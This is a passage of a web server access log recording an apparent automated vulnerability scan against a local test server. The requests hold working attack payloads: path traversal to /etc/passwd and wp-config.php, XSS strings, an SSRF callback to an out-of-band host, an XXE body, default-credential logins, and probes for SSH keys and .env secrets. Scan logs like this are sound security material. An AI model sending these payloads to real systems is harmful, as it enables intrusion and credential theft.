HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.624","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_swagger_/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.467","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pages/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.468","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.484","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/mx_login.gif HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.561","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /home HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.340","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.446","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\x22%20onmouseover=alert(document.domain)// HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.473","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.640","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.ssh/id_dsa HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.944","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.settings/rules.json?auth=FIREBASE_SECRET HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.454","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /playground HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.449","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /env.development.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.380","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%5cexample.com/%2f%2e%2e HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.389","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.391","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/info HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.423","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.957","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v1/swagger-ui/swagger.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.470","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.469","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.516","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /backend/admin/users?username=anonymous HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.466","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ajax/telemetry.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.427","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.key HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.384","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.554","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /magmi/web/js/magmi_utils.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.437","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%5chttp://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.398","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /env.production.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.398","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /../example.com HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/14 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.497","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /portal-graphql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.511","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.463","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /conf HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.529","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /rest/sharelinks/1.0/link?url=https://c9oms3gsmpve1ijt0mc0h8e5soks4iqjh.oast.live/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.414","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.478","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /nextcloud/index.php/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.505","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/users/admin/check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.519","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v1/swagger-ui/swagger.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.520","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /services/user/values.xml?var=STATUS HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.444","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.437","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.426","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /env.test.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.428","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%5cgoogle.com/evil.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.521","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /glpi/ajax/telemetry.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.544","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sso/UI/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.503","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/15 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.484","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/mx_login.gif HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.511","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.env_sample HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.510","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"]>&disclose;","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.517","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.501","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.495","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.405","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.435","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /env.dev.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.366","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //%5cexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.366","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /secadmin/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.426","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"{\x22Password\x22:\x2228fHqXF6JIHgZAFaLO8mNawYXtl\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.496","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"PATCH", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"csrf_token={{csrf_token}}&username=admin&password=admin","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.429","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1/admin/airflow/login", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.538","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /v3/settings/first-login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.929","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///etc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.502","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 